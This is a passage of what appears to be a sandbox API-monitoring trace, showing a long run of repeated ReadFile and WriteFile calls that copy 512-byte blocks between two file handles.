lpOverlapped=0x0) returned 1 [0025.788] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.810] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.815] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.817] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.822] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.841] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.842] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.842] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.843] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.844] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.844] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.845] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.846] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.846] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.847] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.848] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.848] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.849] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.849] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.850] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.850] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.851] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.851] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.852] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.854] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.854] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.855] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.856] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.857] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.859] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, 